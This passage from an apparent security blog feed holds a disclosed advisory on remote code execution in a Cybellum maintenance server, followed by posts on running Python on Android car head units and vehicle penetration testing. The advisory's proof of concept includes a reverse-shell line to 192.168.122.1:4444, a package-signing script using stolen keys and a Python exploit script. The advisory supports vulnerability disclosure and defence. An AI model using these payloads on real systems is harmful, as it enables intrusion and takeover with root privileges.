<code>/api/execute_rce</code>. Uploading an encrypted zip file containing start.sh achieves arbitrary code execution and gives control of the system with root privileges.</p><p>Logged in to Ubuntu, <code>ss</code> shows that port 29000 is served by python.</p><p><img src="image-20240106191143538.png" alt="image-20240106191143538"></p><p>Grepping for the keyword <code>execute_rce</code> finds the source code at /usr/local/lib/python3.8/dist_packages/maintenance_server_microservic.</p><p><img src="image-20240106190919877.png" alt="image-20240106190919877"></p><p>The <code>execute_rce</code> route path is <code>/api/execute_rce</code>. </p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ExecuteRCE</span>:</span></span><br><span class="line"> NAME = <span class="string">'execute_rce'</span></span><br><span class="line"> URI = <span class="string">'/api/execute_rce'</span></span><br><span class="line"> METHODS = [<span class="string">'POST'</span>]</span><br></pre></td></tr></table></figure><p>maintenance_server_microservice ships with its documentation.</p><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">% tree -L 2 maintenance_server_microservice</span><br><span class="line">.</span><br><span class="line">├── __init__.py</span><br><span class="line">├── __pycache__</span><br><span class="line">├── _maintenance_server_microservice.py</span><br><span class="line">├── apis</span><br><span class="line">├── app.py</span><br><span class="line">├── documentation</span><br><span class="line">│ ├── apis.html</span><br><span class="line">│ ├── common</span><br><span class="line">│ ├── cybellum-logo-black.svg</span><br><span class="line">│ ├── cybellum-logo-white.svg</span><br><span class="line">│ ├── description.md</span><br><span class="line">│ ├── docs-api-font.css</span><br><span class="line">│ ├── main.json</span><br><span class="line">│ ├── redoc.standalone.js</span><br><span class="line">│ └── schemas</span><br><span class="line">├── file_signer</span><br><span class="line">├── microservice</span><br><span class="line">├── scripts</span><br><span class="line">├── utils</span><br><span class="line">└── wsgi.py</span><br></pre></td></tr></table></figure><p>The document Maintenance Server API (1.0) is served on <code>http://ip:29000/docs/</code>.</p><p><img src="image-20240108105530439.png" alt="image-20240108105530439"></p><p>As the document shows, the Maintenance Server is a service that exposes an interface to the user that supports the following operations:</p><ol><li><strong>System install</strong> - allows deployment of a fresh system using a supplied installation pack.</li><li><strong>System update</strong> - allows deployment of a new version of the system.</li><li><strong>Restore database</strong> - allows a system database restore after it was backed up using the backup functionality.</li><li><strong>RCE Execution</strong> - allows execution of a signed script on the machine (supplied by Cybellum).</li><li><strong>Update certificates</strong> - allows update of the TLS/SSL certificates of the system.</li></ol><p><strong>RCE Execution</strong> is the target: it allows execution of a signed script on the machine. The signing process may or may not be secure, so next we analyze it and look for the signing key. </p><p>The <code>execute-rce</code> API document is available on <code>http://ip:29000/docs/#operation/execute-rce</code>.</p><p><img src="image-20240108105639641.png" alt="image-20240108105639641"></p><p>The function <code>api_execute_rce</code> is implemented in apis/apis.py.</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">api_execute_rce</span>(<span class="params">self</span>):</span></span><br><span class="line"> args = parse_webargs(MaintenanceServerAPISParamsSpecs.EXECUTE_RCE, request)</span><br><span class="line"> api_params_names = MaintenanceServerAPIDefinitions.ExecuteRCE.Params</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> request.files <span class="keyword">is</span> <span class="literal">None</span> <span class="keyword">or</span> <span class="built_in">len</span>(request.files) != <span class="number">1</span>:</span><br><span class="line"> <span class="keyword">raise</span> ReceivedNotEnoughFilesException()</span><br><span class="line"></span><br><span class="line"> access_key = args[api_params_names.ACCESS_KEY]</span><br><span class="line"> rce_file = api_params_names.RCE_FILE</span><br><span class="line"></span><br><span class="line"> self._validate_access_key(access_key)</span><br><span class="line"></span><br><span class="line"> temp_directory = filesystemex.create_temp_directory()</span><br><span class="line"></span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> self._unpack_file(temp_directory, rce_file, self.RCE_FILE)</span><br><span class="line"> <span class="keyword">except</span>:</span><br><span class="line"> filesystemex.delete_folder(temp_directory)</span><br><span class="line"> <span class="keyword">raise</span></span><br><span class="line"></span><br><span class="line"> task = ExecuteRCETask(rce_file_name=self.RCE_FILE,</span><br><span class="line"> task_manager=self.task_manager,</span><br><span class="line"> files_root=temp_directory)</span><br><span class="line"> self.task_manager.submit_task(task)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> SuccessResponse({<span class="string">"task"</span>: task.to_json()[task.task_id]}).generate_response()</span><br></pre></td></tr></table></figure><p>api_execute_rce gets two parameters, <code>access_key</code> and <code>rce_file</code>, from the frontend. 
</p><p><img src="image-20240108110859694.png" alt="image-20240108110859694"></p><p>First, use validate_access_key(access_key) validate access key.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">_validate_access_key</span>(<span class="params">self, access_key</span>):</span></span><br><span class="line"> <span class="keyword">with</span> <span class="built_in">open</span>(self.ACCESS_KEY_FILE_PATH) <span class="keyword">as</span> f:</span><br><span class="line"> content = json.load(f)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> content <span class="keyword">or</span> <span class="string">'access_key'</span> <span class="keyword">not</span> <span class="keyword">in</span> content <span class="keyword">or</span> content[<span class="string">'access_key'</span>] != access_key:</span><br><span class="line"> <span class="keyword">raise</span> InvalidAccessKeyException()</span><br></pre></td></tr></table></figure><p>ACCESS_KEY_FILE_PATH link to <code>/mnt/cybellum/maintenance_server/access_key.json</code>, default access_key is 123.</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">{<span class="attr">"access_key"</span>:<span class="string">"123"</span>}</span><br></pre></td></tr></table></figure><p>Second, in <code>use _upack_file</code> to use <code>FileSigner.unpack_file</code> validate and decrypt encrypted file.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span 
class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">_unpack_file</span>(<span class="params">self, destination, file_name, unpacked_file_name</span>):</span></span><br><span class="line"> file_path = os.path.join(destination, file_name)</span><br><span class="line"> decrypted_file_path = os.path.join(destination, unpacked_file_name)</span><br><span class="line"></span><br><span class="line"> request.files[file_name].save(file_path)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">with</span> <span class="built_in">open</span>(os.path.join(self.SIGN_KEY_HOME, self.PRIVATE_ENCRYPTION_KEY_PASS)) <span class="keyword">as</span> f:</span><br><span class="line"> private_encryption_key_pass = f.read().strip()</span><br><span class="line"></span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> FileSigner.unpack_file(file_path,</span><br><span class="line"> public_key_path=os.path.join(self.SIGN_KEY_HOME, self.SIGNATURE_PUBLIC_KEY),</span><br><span class="line"> private_encryption_key_path=os.path.join(self.SIGN_KEY_HOME,</span><br><span class="line"> self.ENCRYPTION_PRIVATE_KEY),</span><br><span class="line"> private_encryption_key_pass=private_encryption_key_pass,</span><br><span class="line"> path_to_extract_orig=decrypted_file_path)</span><br><span class="line"></span><br><span class="line"> <span 
class="keyword">except</span> Exception:</span><br><span class="line">        raise Exception('Could not unpack file')</span><br></pre></td></tr></table></figure><p>Third, <code>unpack_file</code> reverses the packing in four steps:</p><ol><li>Read the signature segment from the packed file.</li><li>Load the public key <code>signature_public_key.pem</code> and verify the signature over the MD5 digest of the encrypted data.</li><li>Read the encrypted symmetric key from the packed file.</li><li>Read the encrypted data and decrypt it with the symmetric key, which is itself recovered with <code>encryption_private_key.pem</code>.</li></ol><p>(Signing an MD5 digest is weak in its own right, since MD5 is collision-prone, but the exploitable problem below is where the keys live, not the hash.)</p><p>A packed file therefore consists of three segments: a signature segment, an encryption-parameter segment and an encrypted-data segment.</p><p><img src="image-20240106220903113.png" alt="image-20240106220903113" style="zoom: 60%;" /></p><p>Finally, <code>ExecuteRCETask</code> executes <code>rce_file</code>. The archive is unzipped, the working directory is made world-writable with <code>sudo chmod 777</code>, and <code>start.sh</code> is run with bash: once a package passes the signature check, whatever it contains is executed.</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line">class ExecuteRCETask(ExecutableTask):</span><br><span class="line">    SCRIPT_NAME = "start.sh"</span><br><span class="line"></span><br><span class="line">    def __init__(self, rce_file_name, *args, **kwargs):</span><br><span class="line">        super(ExecuteRCETask, self).__init__(*args, **kwargs)</span><br><span class="line">        self.task_type = TaskTypes.EXECUTE_RCE.value</span><br><span class="line">        self.rce_file_name = rce_file_name</span><br><span class="line"></span><br><span class="line">    def _execute_specific_task_callback(self, *args, **kwargs):</span><br><span class="line">        output_location = self.get_results_location()</span><br><span class="line"></span><br><span class="line">        self.run_subprocess(["unzip", os.path.join(self.files_root, self.rce_file_name)])</span><br><span class="line">        self.run_subprocess(["sudo", "chmod", "777", "-R", self.files_root])</span><br><span class="line">        exe_path = os.path.realpath(os.path.join(self.files_root, self.SCRIPT_NAME))</span><br><span class="line">        if not os.path.exists(exe_path):</span><br><span class="line">            raise MissingRceExeFile()</span><br><span class="line">        self.run_subprocess(["bash",</span><br><span class="line">                             os.path.realpath(os.path.join(self.files_root, self.SCRIPT_NAME)),</span><br><span class="line">                             output_location], preexec_fn=os.setpgrp)</span><br><span class="line"></span><br><span class="line">        if len(os.listdir(output_location)):</span><br><span class="line">            self.result_downloadable = True</span><br></pre></td></tr></table></figure><p>The keys live in the <code>/mnt/cybellum/maintenance_server/keys</code> directory.</p><p><img src="image-20240108125724597.png" alt="image-20240108125724597"></p><ul><li><strong>encryption_private_key.pem</strong>: the private key, used both for signing and for decryption.</li><li><strong>private_pass.txt:</strong> the passphrase protecting that private key.</li><li><strong>signature_public_key.pem:</strong> the public key used to verify signatures (and, in <code>sign_and_pack_file</code>, to encrypt).</li></ul><p><strong>Key reuse:</strong> signing and encryption share a single key pair. <code>encryption_private_key.pem</code> signs packages and also decrypts them, so the private key that has to stay on the appliance in order to decrypt uploads is the same key that authorises them.</p><p>Once we have access to the host, we can read the signing/decryption key and its passphrase from the filesystem, put an arbitrary shell script into <code>start.sh</code> and pack it. The platform accepts the package as legitimate and executes the script: remote code execution.</p><p>If signing and encryption used separate key pairs and the signing private key were kept off the appliance, only Cybellum could produce a package that <code>execute-rce</code> accepts; an attacker on the host would hold the decryption key but not the signing key.</p><h3 id="Proof-of-concept"><a href="#Proof-of-concept" class="headerlink" title="Proof of concept"></a>Proof of concept</h3><ol><li><p>Prepare the reverse-shell payload <code>bash -i >& /dev/tcp/192.168.122.1/4444 0>&1</code> and save it as <code>start.sh</code>.</p></li><li><p>Compress <code>start.sh</code> into <code>rce.zip</code>.</p></li><li><p>Sign and encrypt the zip file into <code>rce.zip.packed</code>, using the server's own <code>FileSigner</code> helper and the keys taken from the host.</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line">import os</span><br><span class="line"># FileSigner is the packing helper from the Cybellum maintenance-server code base (import path omitted)</span><br><span class="line"></span><br><span class="line">def sign_and_pack_file(destination, file_name, packed_file_name):</span><br><span class="line">    file_path = os.path.join(destination, file_name)</span><br><span class="line">    packed_file_path = os.path.join(destination, packed_file_name)</span><br><span class="line">    PRIVATE_ENCRYPTION_KEY_PASS = "maintenance_server/keys/private_pass.txt"</span><br><span class="line">    with open(PRIVATE_ENCRYPTION_KEY_PASS) as f:</span><br><span class="line">        private_encryption_key_pass = f.read().strip()</span><br><span class="line"></span><br><span class="line">    # Same key material the server uses to verify and decrypt: this is the key reuse</span><br><span class="line">    FileSigner.sign_and_pack_file(private_key_path="maintenance_server/keys/encryption_private_key.pem",</span><br><span class="line">                                  private_key_pass=private_encryption_key_pass,</span><br><span class="line">                                  input_file=file_path, signed_file_path=packed_file_path,</span><br><span class="line">                                  public_encryption_key_path="maintenance_server/keys/signature_public_key.pem")</span><br><span class="line">    print('The file was signed successfully and was stored at {}'.format(packed_file_path))</span><br></pre></td></tr></table></figure></li><li><p>POST the payload to <code>/api/execute_rce</code>.</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line">import requests</span><br><span class="line"></span><br><span class="line">banner = '''</span><br><span class="line"> ██████╗ ██ ╔██████ ██████╗ █████╗ ██████╗██╗ ██╗██████╗ ██████╗ ██████╗ ██████╗ </span><br><span class="line"> ██╔════╝ ██ ╚════║██ ██╔══██╗██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔═══██╗██╔═══██╗██╔══██╗</span><br><span class="line"> ██║ ██ ║██ ██████╔╝███████║██║ █████╔╝ ██║ ██║██║ ██║██║ ██║██████╔╝</span><br><span class="line"> ██║ ██ ║██ ██╔══██╗██╔══██║██║ ██╔═██╗ ██║ ██║██║ ██║██║ ██║██╔══██╗</span><br><span class="line"> ╚██████╗ ██ ╔██████╝ ██████╔╝██║ ██║╚██████╗██║ ██╗██████╔╝╚██████╔╝╚██████╔╝██║ ██║</span><br><span class="line"> ╚═════╝ ██ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝</span><br><span class="line"></span><br><span class="line">'''</span><br><span class="line"></span><br><span class="line">url = "http://192.168.1.102:29000/api/execute_rce"</span><br><span class="line"></span><br><span class="line">headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36'}</span><br><span class="line">payloads = {"access_key": "123"}</span><br><span class="line"></span><br><span class="line">print(banner)</span><br><span class="line">print("Cybellum Backdoor exploit Program")</span><br><span class="line"></span><br><span class="line"># Upload the packed start.sh; the server verifies the signature, decrypts it and runs it</span><br><span class="line">with open('E:/ing/cybellum/rce.zip.packed', 'rb') as f:</span><br><span class="line">    response = requests.post(url, data=payloads, headers=headers, files={'rce_file': f})</span><br><span class="line"></span><br><span class="line">if "result_downloadable" in response.text:</span><br><span class="line">    print("Exploit success")</span><br><span class="line">else:</span><br><span class="line">    print("Error")</span><br></pre></td></tr></table></figure></li><li><p>Get a root shell.</p><p><img src="cybellum_backdoor_exp.gif" alt=""></p></li></ol><h3 id="About-Us"><a href="#About-Us" class="headerlink" title="About Us"></a>About Us</h3><p><a href="https://twitter.com/delikely">@delikely</a>, security researcher at QAX StarV Security Lab.</p><p>@Imweekend, security researcher at CAERI.</p><h3 id="Timeline"><a href="#Timeline" class="headerlink" title="Timeline"></a>Timeline</h3><ul><li>2023-06-21 Contacted the vendor by email.</li><li>2023-06-26 Cybellum confirmed the issue.</li><li>2023-09-13 CVE reserved.</li><li>2023-10-09 Cybellum released its security advisory.</li><li>2024-02-18 This advisory published.</li></ul><h3 id="More"><a href="#More" class="headerlink" title="More"></a>More</h3><ul><li><a href="https://cybellum.force.com/CustomerPortal/s/case/5004x00000XjTuS">Cybellum advisories</a></li><li><a href="https://github.com/delikely/advisories/tree/main/Cybellum">Researcher advisories</a></li></ul>]]></content>
<summary type="html"><h2 id="Take-a-glance-of-browser-I-find-Cybellum-RCE"><a href="#Take-a-glance-of-browser-I-find-Cybellum-RCE" class="headerlink" title="Take</summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
<entry>
<title>Advanced Connected-Vehicle Security Trick: Running Python on an Android Head Unit</title>
<link href="http://delikely.github.io/2023/11/16/pydroid/"/>
<id>http://delikely.github.io/2023/11/16/pydroid/</id>
<published>2023-11-16T09:36:02.000Z</published>
<updated>2023-11-19T10:48:53.000Z</updated>
<content type="html"><![CDATA[<h2 id="车联网安全进阶之Trick——Android车机运行Python"><a href="#车联网安全进阶之Trick——Android车机运行Python" class="headerlink" title="车联网安全进阶之Trick——Android车机运行Python"></a>Advanced Connected-Vehicle Security Trick: Running Python on an Android Head Unit</h2><p>In a whole-vehicle environment, network segmentation splits the vehicle into several networks. Most ECUs (in this article, ECU refers specifically to ECUs with a TCP/IP stack) cannot be connected directly to the test machine. Tunnelling tools do let you reach these isolated ECUs, but testing through a tunnel can produce abnormal connections because of the forwarding involved. For example, a SOME/IP script written with Python's Scapy module cannot establish a connection through the tunnel.</p><p>Python scripts are flexible and there are plenty of modules, but getting Python onto the vehicle is a real problem. Automated-driving units usually ship with Python, but the IVI head unit, which is the usual entry point for testing, does not. During some recent vulnerability research I urgently needed Python on the head unit, so once again I searched for ways to run Python on Android. Every answer pointed to the same thing: a Python IDE app. That means installing an app, and some newly released head units enforce system signature verification, so third-party apps cannot be installed. Let's try the app route first anyway.</p><h3 id="方案①:安装-Python-IDE-APP"><a href="#方案①:安装-Python-IDE-APP" class="headerlink" title="方案①:安装 Python IDE APP"></a>Option 1: Install a Python IDE app</h3><p>QPython and Pydroid are the most widely used editors/IDEs on Android. On a head unit that allows third-party apps, install one with adb. Using it is then awkward: a GUI is a liability during testing. Treat the head-unit screen as a monitor and plug in an external keyboard? Some head units do not even recognise a keyboard.</p><p>Then I remembered that Termux on my phone can install Python too. Termux is an app as well, but it is not really graphical: its main interface is a command line. How do you drive a command-line-only Termux through ADB? On to the second option: using Termux from ADB.</p><blockquote><p>Termux is a terminal emulator app for Android that runs a command-line interface and Linux packages on Android devices. It provides a complete Linux environment, including common command-line tools, programming languages and a package manager.</p></blockquote><p><img src="7a1ea276b7443e7470d5659092906f8.jpg" alt="7a1ea276b7443e7470d5659092906f8" style="zoom:40%;" /></p><h3 id="方案②:ADB中使用Termux"><a href="#方案②:ADB中使用Termux" class="headerlink" title="方案②:ADB中使用Termux"></a>Option 2: Use Termux from ADB</h3><p>First, check which shell Termux uses by looking at its environment; SHELL is <code>/data/data/com.termux/files/usr/bin/bash</code>.</p><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">~ $ echo $SHELL</span><br><span class="line">/data/data/com.termux/files/usr/bin/bash</span><br></pre></td></tr></table></figure><p>Try it on the phone first: enter an ADB shell and switch to Termux's shell. Good news: we are inside a command-line Termux. Bad news: Python will not run.</p><p><img src="image-20231116013338800.png" alt="image-20231116013338800" style="zoom:60%;" /></p><p>Python is in fact installed; it fails to run because the environment variables are missing. Add what is missing: with PATH set you can call python and the other commands directly, and LD_LIBRARY_PATH, which points at the shared libraries, is equally indispensable.</p><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">export LD_LIBRARY_PATH=/data/data/com.termux/files/usr/lib/</span><br><span class="line">export PATH=$PATH:/data/data/com.termux/files/usr/bin</span><br></pre></td></tr></table></figure><p>With the variables set, Python starts as expected.</p><p><img src="image-20231116014135737.png" alt="image-20231116014135737"></p><p>Now the real problem: Python works, but this particular car does not allow third-party apps, so the question is how to use Termux without installing the APK. Getting this far proves that running Python over ADB is feasible, so the next step is to migrate Termux.</p><h3 id="方案③:-迁移Termux"><a href="#方案③:-迁移Termux" class="headerlink" title="方案③: 迁移Termux"></a>Option 3: Migrate Termux</h3><p>Looking at the file layout of an installed Termux, <code>/data/data/com.termux/files/usr/</code> is just a POSIX-style filesystem tree.</p><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">.../data/com.termux $ tree -L 3</span><br><span class="line">├── cache</span><br><span class="line">│   └── apt</span><br><span class="line">│       ├── archives</span><br><span class="line">│       ├── pkgcache.bin</span><br><span class="line">│       └── srcpkgcache.bin</span><br><span class="line">├── files</span><br><span class="line">│   ├── home</span><br><span class="line">│   │   └── test</span><br><span class="line">│   └── usr</span><br><span class="line">│       ├── bin</span><br><span class="line">│       ├── code</span><br><span class="line">│       ├── etc</span><br><span class="line">│       ├── include</span><br><span class="line">│       ├── lib</span><br><span class="line">│       ├── libexec</span><br><span class="line">│       ├── share</span><br><span class="line">│       ├── tmp</span><br><span class="line">│       └── var</span><br><span class="line">└── shared_prefs</span><br><span class="line">    └── com.termux_preferences.xml</span><br></pre></td></tr></table></figure><p>The head unit has the same architecture as the phone, so pack the tree up and copy it straight over.</p><p><img src="5QjG2ijRYR7XCFk1rx44ZC4uUQxBEYPx.jpeg" alt="img" style="zoom:25%;" /></p><p>Copy it to <code>/data/local/tmp/</code> and set the environment variables to match.</p><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">export LD_LIBRARY_PATH=/data/local/tmp/data/data/com.termux/files/usr/lib</span><br><span class="line">export PATH=$PATH:/data/local/tmp/data/data/com.termux/files/usr/bin</span><br></pre></td></tr></table></figure><p>Python starts!</p><p><img src="image-20231116091737037.png" alt="image-20231116091737037"></p><p>It works, but the package is about 700 MB; it feels like it could be slimmed down.</p><h3 id="方案④:独立的-Python"><a href="#方案④:独立的-Python" class="headerlink" title="方案④:独立的 Python"></a>Option 4: A standalone Python</h3><p>The phone is AArch64 and so is the head unit, so perhaps Termux's Python package can be used on its own. Download <a href="https://packages.termux.dev/apt/termux-main/pool/main/p/python/python_3.11.6-1_aarch64.deb">python_3.11.6-1_aarch64.deb</a> from the Termux package repository.</p><p>The .deb contains three files; data.tar.gz holds the program files.</p><p><img src="image-20231116020747184.png" alt="image-20231116020747184"></p><p>Unpacked onto the head unit, it errors out with a missing dependency.</p><p><img src="image-20231116092005407.png" alt="image-20231116092005407"></p><p>Pulling each missing library out of the Termux lib directory seemed like too much effort, but having come this far I tried adding the dependency anyway. Uploading libandroid-support.so to <code>/data/local/tmp/data/data/com.termux/files/usr/lib</code> actually worked, and there was no chain of further missing dependencies.</p><p><img src="image-20231116153844613.png" alt="image-20231116153844613"></p><p>I tried pip next; the package does not include pip.</p><p><img src="image-20231116153931709.png" alt="image-20231116153931709" style="zoom:80%;" /></p><p>After adding pip, modules can be installed but not used, because the configured library paths must match Termux's file layout, and a standalone copy necessarily changes those paths. I then thought of changing pip's default install location, but that configuration has to be written to a file under the root directory, and on most head units the root filesystem is not writable.</p><p><img src="image-20231116105602858.png" alt="image-20231116105602858"></p><p>Rather than keep fixing bugs, it is easier to use the Termux environment copied over in Option 3. Use Termux's environment as it is and accept the larger disk footprint.</p><p><img src="d73dccec9b38de5463f3e91df31abf3aac5832fea003-h7c4Sg_fw658webp.webp" alt="“又不是不能用”表情包进化史,越来越抽象了" style="zoom:50%;" /></p><p>There is one more option: a virtual environment. Running <code>python -m venv venv</code> also errors out, as expected, but after fixing the error it works. The packaged result is at <a href="https://github.com/delikely/Automotive-Security-Toolkit/tree/main/pydroid">https://github.com/delikely/Automotive-Security-Toolkit/tree/main/pydroid</a>, help yourself.</p><p><img src="image-20231116154026357.png" alt="image-20231116154026357"></p><h3 id="方案⑤:静态编译Python"><a href="#方案⑤:静态编译Python" class="headerlink" title="方案⑤:静态编译Python"></a>Option 5: A statically compiled Python</h3><p>Then again, different head units may be missing different dependencies, so is there a statically compiled Python? That may be the best solution: a statically compiled Python and pip, like a static busybox, would run without any dependency issues. I searched round and round and there is nothing ready-made. Any brave soul willing to try building Python statically?</p><h3 id="系列文章"><a href="#系列文章" class="headerlink" title="系列文章"></a>Series</h3><ol><li><a href="https://mp.weixin.qq.com/s/FzF7ERiWZ_GGKLW4kqrH9Q">Connected-Vehicle Security Basics: Automotive Modular Platforms</a></li><li><a href="https://mp.weixin.qq.com/s/YyHRexeKgGd4RAgQ4o-jKw">Connected-Vehicle Security Basics: Volkswagen Group's Automotive E/E Architecture</a></li><li><a href="https://mp.weixin.qq.com/s/WmNT6Kbw74EluaKLZUH64g">Connected-Vehicle Security Basics: Main Functions of the T-Box</a></li><li><a href="https://mp.weixin.qq.com/s/RKU0YevKmSOJtb3NMOEy9w">Connected-Vehicle Security Basics: Volkswagen J949 (OCU/T-Box)</a></li><li><a href="https://mp.weixin.qq.com/s/l1-RZ9rI09p__2hwPKSRVw">Connected-Vehicle Security Basics: Charging Infrastructure</a></li><li><a href="https://mp.weixin.qq.com/s/9KVNgiToeDsDIlR1FBMohw">Connected-Vehicle Security Basics: Analysing the In-Vehicle Network Topology from Connector Pinouts</a></li><li><a href="https://mp.weixin.qq.com/s/bVt5-d_XQsEhoODffQheOA">Connected-Vehicle Security Basics: QNX Commands</a></li><li><a href="https://mp.weixin.qq.com/s/pFf7hvan2Z9VOxGyuwIvmg">Connected-Vehicle Security Basics: Buying a Test Bench</a></li><li><a href="https://mp.weixin.qq.com/s/01tV6GfK8L4hNEyn0suwdw">Connected-Vehicle Security Basics: Making a USB SPH2.0 Harness</a></li><li><a href="https://mp.weixin.qq.com/s/X6mVWpj796ZZt9MFzi7U0A">Connected-Vehicle Security Basics: Prerequisites for UDS Flashing</a></li><li><a href="https://mp.weixin.qq.com/s/hOmN2xzSidCAQ_KrTJ-3VA">Connected-Vehicle Security Basics: UDS Flashing Security</a></li><li><a href="https://mp.weixin.qq.com/s/R7h0BB7Plyvg4afFpRm-4Q">Advanced Connected-Vehicle Security: Cross-Border Transfer Detection Method and Script</a></li><li><a href="https://mp.weixin.qq.com/s/HoYENGmv8ahX4EbTlswffg">Advanced Connected-Vehicle Security: Whole-Vehicle Penetration Testing in Practice</a></li></ol>]]></content>
<summary type="html"><h2 id="车联网安全进阶之Trick——Android车机运行Python"><a href="#车联网安全进阶之Trick——Android车机运行Python" class="headerlink" title="车联网安全进阶之Trick——Android车机运行Python"></a>Advanced Connected-Vehicle Security Trick: Running Python on an Android Head Unit</h2></summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
<entry>
<title>Advanced Connected-Vehicle Security: Whole-Vehicle Penetration Testing in Practice</title>
<link href="http://delikely.github.io/2023/10/10/pentest-workflow-for-automotive/"/>
<id>http://delikely.github.io/2023/10/10/pentest-workflow-for-automotive/</id>
<published>2023-10-10T14:24:44.000Z</published>
<updated>2023-10-17T10:38:50.000Z</updated>
<content type="html"><![CDATA[<h2 id="车联网安全进阶之整车渗透测试实践"><a href="#车联网安全进阶之整车渗透测试实践" class="headerlink" title="车联网安全进阶之整车渗透测试实践"></a>Advanced Connected-Vehicle Security: Whole-Vehicle Penetration Testing in Practice</h2><p>Penetration testing is widely known and much discussed, yet doing it well is not easy given limited information and tight project schedules. This article shares what I have learned from real-world penetration tests of intelligent connected vehicles: the process, and the points to watch.</p><p>A penetration test simulates a real attack in order to assess security. Testers use the same tools, techniques and procedures as an attacker to find the vehicle's weak points and demonstrate their business impact. Penetration testing brings four benefits:</p><ol><li>it helps establish how reliable the security strategy is;</li><li>it identifies and mitigates cybersecurity issues overlooked during design, development and deployment;</li><li>it supports compliance with domestic and international regulations, providing the evidence needed to obtain certification;</li><li>its results give management a qualitative and quantitative view of the current security posture of the company or product and of budget priorities.</li></ol><p>ISO/SAE 21434 lists penetration testing as one of four test methods (functional testing, vulnerability scanning, fuzzing and penetration testing). In real projects, penetration testing is defined more broadly: vulnerability scanning and fuzzing are usually techniques applied within a penetration test.</p><h3 id="测试方法"><a href="#测试方法" class="headerlink" title="测试方法"></a>Test methods</h3><p>UNECE WP.29 R155 states that "the vehicle manufacturer shall perform appropriate and sufficient testing before type approval to verify the effectiveness of the security measures implemented". "Appropriate and sufficient testing" means different methods for different goals and expected results, and also different testers: an internal team versus an external security team. An internal security team can use all three of black-, white- and grey-box testing, while an external team usually does black-box testing, sometimes with a small grey-box component.</p><ol><li><strong>White-box testing</strong> </li></ol><p>In white-box testing the testers have access to all information (source code, binaries, design documents of every kind), and the work is mostly review: code audit, document review and so on. Because the material is highly sensitive, usually only a company's internal team has the opportunity to do white-box testing. "Opportunity" is the operative word: although the OEM owns the vehicle system, it does not necessarily own the code inside it, so an OEM security department gets relatively few chances to do white-box testing, just like a third-party security vendor. For that reason some OEM-side security staff fall into the misconception that penetration testing is black-box only, that no information needs to be provided, and that the test team must obtain everything by itself.</p><ol start="2"><li><strong>Black-box testing</strong></li></ol><p>In black-box testing the testers have no internal information about the vehicle system and attempt attacks from every possible internal and external vector to find weak points. Most real projects are black-box, and the key information, such as IPC/RPC mechanisms, proprietary protocol field definitions and how OTA packages are distributed, has to be obtained by reverse engineering.</p><ol start="3"><li><strong>Grey-box testing</strong></li></ol><p>In grey-box testing the testers have some knowledge of the system and access to design documents such as algorithms, system architecture and internal data structures, from which they can build test cases. Internal teams get more design documents; external teams mainly receive the security design specifications.</p><h3 id="测试流程"><a href="#测试流程" class="headerlink" title="测试流程"></a>Test process</h3><p>This article takes the vendor's perspective, that of a third-party tester, on intelligent connected vehicle penetration testing. The overall project flow largely follows the <a href="http://www.pentest-standard.org">Penetration Testing Execution Standard</a>, but the vehicle scenario needs some adjustments, with extra items for project management and information gathering.</p><p><img src="image-20231006112251653.png" alt="image-20231006112251653"></p><h4 id="1-前期沟通"><a href="#1-前期沟通" class="headerlink" title="1. 前期沟通"></a>1. <strong>Initial engagement</strong></h4><p>This phase includes the kick-off meeting with the relevant stakeholders to settle the scope, the test environment, the rules of engagement, the material to be collected, the schedule, the testers, the location and the project goals.</p><ul><li>Target: a component or the whole vehicle</li><li>Environment: whether a bench is provided for whole-vehicle testing; which components the bench includes and whether the environment is complete</li><li>Rules: development or production build; whether debug access is available; whether hardware may be disassembled</li><li>Schedule: start date and duration</li><li>Testers: headcount and skill set required by the project and the client</li><li>Material: agree with the client which material the project needs (see the list of material the client should provide)</li><li>Goals: what must be achieved by the end of the project</li></ul><h4 id="2-前期信息收集"><a href="#2-前期信息收集" class="headerlink" title="2. 前期信息收集"></a>2. <strong>Preliminary information gathering</strong></h4><p>Organise the material received from the client in the previous phase to form an initial picture of the target, and prepare the test equipment.</p><p>OEMs use <a href="https://delikely.eu.org/2021/07/25/Automotive-Modular-Platform/">modular platforms</a> to 